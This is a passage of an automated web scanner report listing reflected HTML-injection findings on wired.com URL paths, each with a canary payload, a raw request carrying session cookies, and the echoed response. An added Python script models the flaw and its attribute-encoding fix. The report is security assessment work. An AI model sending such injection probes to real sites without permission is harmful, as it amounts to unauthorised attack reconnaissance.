<body class="s_news ss_archive88eb2"><a>01f8e05d095 c_2010-01">
...[SNIP]...

1.183. http://www.wired.com/news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e94db"><a>4cebf2d1561 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/archive/2010-01e94db"><a>4cebf2d1561/15/javascript-hack-enables-flash-on-iphone HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 22 Nov 2010 01:22:18 GMT
Date: Mon, 22 Nov 2010 01:12:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_news ss_archive c_2010-01e94db"><a>4cebf2d1561">
...[SNIP]...

1.184. http://www.wired.com/politics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c427d"><a>e6d5b4a7516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politicsc427d"><a>e6d5b4a7516 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29299
Vary: Accept-Encoding
Cache-Control: max-age=239
Expires: Mon, 22 Nov 2010 01:15:40 GMT
Date: Mon, 22 Nov 2010 01:11:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politicsc427d"><a>e6d5b4a7516">
...[SNIP]...

1.185. http://www.wired.com/politics/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70abd"><a>9d24c849cc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics70abd"><a>9d24c849cc4/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29300
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Sun, 21 Nov 2010 20:20:15 GMT
Date: Sun, 21 Nov 2010 20:16:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics70abd"><a>9d24c849cc4">
...[SNIP]...

1.186. http://www.wired.com/politics/law [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/law

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 209da"><a>9d347d00209 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics209da"><a>9d347d00209/law HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:13:03 GMT
Date: Sun, 21 Nov 2010 23:09:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics209da"><a>9d347d00209 ss_law">
...[SNIP]...

1.187. http://www.wired.com/politics/law [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/law

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82c1"><a>05b6fbcb3c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics/lawd82c1"><a>05b6fbcb3c6 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:31 GMT
Date: Sun, 21 Nov 2010 23:09:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics ss_lawd82c1"><a>05b6fbcb3c6">
...[SNIP]...

1.188. http://www.wired.com/politics/onlinerights [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/onlinerights

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 623f2"><a>92180a2ca9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics623f2"><a>92180a2ca9b/onlinerights HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29328
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:13:05 GMT
Date: Sun, 21 Nov 2010 23:09:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics623f2"><a>92180a2ca9b ss_onlinerights">
...[SNIP]...

1.189. http://www.wired.com/politics/onlinerights [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/onlinerights

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ecce"><a>b1a59a8a533 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics/onlinerights3ecce"><a>b1a59a8a533 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29328
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:32 GMT
Date: Sun, 21 Nov 2010 23:09:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics ss_onlinerights3ecce"><a>b1a59a8a533">
...[SNIP]...

1.190. http://www.wired.com/politics/security [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5482e"><a>d19474f130 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics5482e"><a>d19474f130/security HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29318
Vary: Accept-Encoding
Cache-Control: max-age=229
Expires: Sun, 21 Nov 2010 23:12:58 GMT
Date: Sun, 21 Nov 2010 23:09:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics5482e"><a>d19474f130 ss_security">
...[SNIP]...

1.191. http://www.wired.com/politics/security [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f2a3"><a>f519379c247 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics/security5f2a3"><a>f519379c247 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29320
Vary: Accept-Encoding
Cache-Control: max-age=555
Expires: Sun, 21 Nov 2010 23:18:52 GMT
Date: Sun, 21 Nov 2010 23:09:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics ss_security5f2a3"><a>f519379c247">
...[SNIP]...
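Findings 1.191 through 1.209 below all share one sink: a URL path segment is copied, without encoding, into the double-quoted class attribute of the <body> tag, so the canary's `">` closes both the attribute and the tag and the `<a>` that follows becomes a real element. The script below is an added example for this page, not code from the Burp report or from wired.com. It models that sink with a vulnerable renderer and a hardened one, reproduces the two checks the scanner performed (exact echo of the payload, then whether the injected tag is parsed as an element) and shows the hardened renderer failing both. The s_/ss_/c_ class-prefix scheme it uses is inferred from the responses in the report and is an assumption about how the page builds the attribute.

```python
"""Model and verify the attribute break-out reported in 1.191 through 1.209.

Added example for this page, not code from the Burp report or from wired.com.
ASSUMPTION: the page builds <body class="s_<seg1> ss_<seg2> c_<seg3>"> from the
first three URL path segments; that scheme is inferred from the responses
in the report (e.g. s_science ss_discoveries c_news) and modelled here.
"""
import html
import re
from html.parser import HTMLParser

# Path and payload copied from finding 1.191 (REST URL parameter 2).
PATH_SEGMENTS = ["politics", "security"]
PAYLOAD = '5f2a3"><a>f519379c247'
CLASS_PREFIXES = ("s_", "ss_", "c_")  # inferred from the report's responses


def render_body_vulnerable(segments):
    """Behaviour seen in the report: segments copied verbatim into a
    double-quoted attribute, so a '"' in a segment terminates the value."""
    classes = " ".join(p + s for p, s in zip(CLASS_PREFIXES, segments))
    return '<body class="%s">' % classes


def render_body_hardened(segments):
    """Fix: HTML-attribute-encode each segment. With '"', '<', '>' and '&'
    encoded, the segment cannot leave the attribute whatever it contains."""
    classes = " ".join(p + html.escape(s, quote=True)
                       for p, s in zip(CLASS_PREFIXES, segments))
    return '<body class="%s">' % classes


class _TagCollector(HTMLParser):
    """Records every start tag with its attributes, as a browser would parse it."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(fragment):
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags


def echoed_unmodified(payload, response_body):
    """Scanner check 1: the exact payload string appears in the response."""
    return payload in response_body


def tag_injected(payload, response_body):
    """Scanner check 2: a tag name carried in the payload is parsed as a real
    element, i.e. the payload closed the attribute and the enclosing tag."""
    parsed_names = [name for name, _ in parse_tags(response_body)]
    payload_names = re.findall(r"<([A-Za-z][A-Za-z0-9]*)", payload)
    return any(name.lower() in parsed_names for name in payload_names)


def assess(render, segments, payload, position):
    """Append the payload to the path segment numbered `position` (1-based,
    Burp's 'REST URL parameter N'), render, and run both checks."""
    tainted = list(segments)
    tainted[position - 1] += payload
    body = render(tainted)
    return {
        "html": body,
        "echoed": echoed_unmodified(payload, body),
        "tag_injected": tag_injected(payload, body),
    }


if __name__ == "__main__":
    for label, render in (("vulnerable", render_body_vulnerable),
                          ("hardened", render_body_hardened)):
        result = assess(render, PATH_SEGMENTS, PAYLOAD, position=2)
        print("%-10s %s" % (label, result["html"]))
        print("           echoed=%s tag_injected=%s"
              % (result["echoed"], result["tag_injected"]))
```

Running the script prints both renderings; the vulnerable one reproduces the `<body class="s_politics ss_security5f2a3"><a>f519379c247">` line from the 1.191 response byte for byte, and the parser sees two elements where the hardened output yields one. For the manual follow-up the report asks for, `echoed_unmodified` can be pointed at live responses to map which characters in a path segment survive into the attribute; whatever that shows, attribute-encoding the segment (or restricting it to `[A-Za-z0-9_-]` before it is used as a class name) removes the break-out, and the fix belongs in the 404 template as much as in the normal page template, since every reflection in this run is on a 404 response.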

1.192. http://www.wired.com/science [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da50c"><a>af7f20fae3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceda50c"><a>af7f20fae3a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29259
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:42 GMT
Date: Mon, 22 Nov 2010 01:11:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceda50c"><a>af7f20fae3a">
...[SNIP]...

1.193. http://www.wired.com/science/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb46"><a>7e95b9b5c37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science8fb46"><a>7e95b9b5c37/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29260
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Sun, 21 Nov 2010 20:03:06 GMT
Date: Sun, 21 Nov 2010 19:59:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science8fb46"><a>7e95b9b5c37">
...[SNIP]...

1.194. http://www.wired.com/science/discoveries [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96ddf"><a>cdde2cce323 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science96ddf"><a>cdde2cce323/discoveries HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29286
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:13:10 GMT
Date: Sun, 21 Nov 2010 23:09:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science96ddf"><a>cdde2cce323 ss_discoveries">
...[SNIP]...

1.195. http://www.wired.com/science/discoveries [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38394"><a>ab4904fcd7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries38394"><a>ab4904fcd7d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29286
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:35 GMT
Date: Sun, 21 Nov 2010 23:09:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries38394"><a>ab4904fcd7d">
...[SNIP]...

1.196. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/1999/09/31631

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbd1d"><a>538a6317253 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencecbd1d"><a>538a6317253/discoveries/news/1999/09/31631 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:55 GMT
Date: Sun, 21 Nov 2010 23:12:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencecbd1d"><a>538a6317253 ss_discoveries c_news">
...[SNIP]...

1.197. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/1999/09/31631

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3da6c"><a>360db666dd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries3da6c"><a>360db666dd0/news/1999/09/31631 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:13 GMT
Date: Sun, 21 Nov 2010 23:13:13 GMT
Connection: close
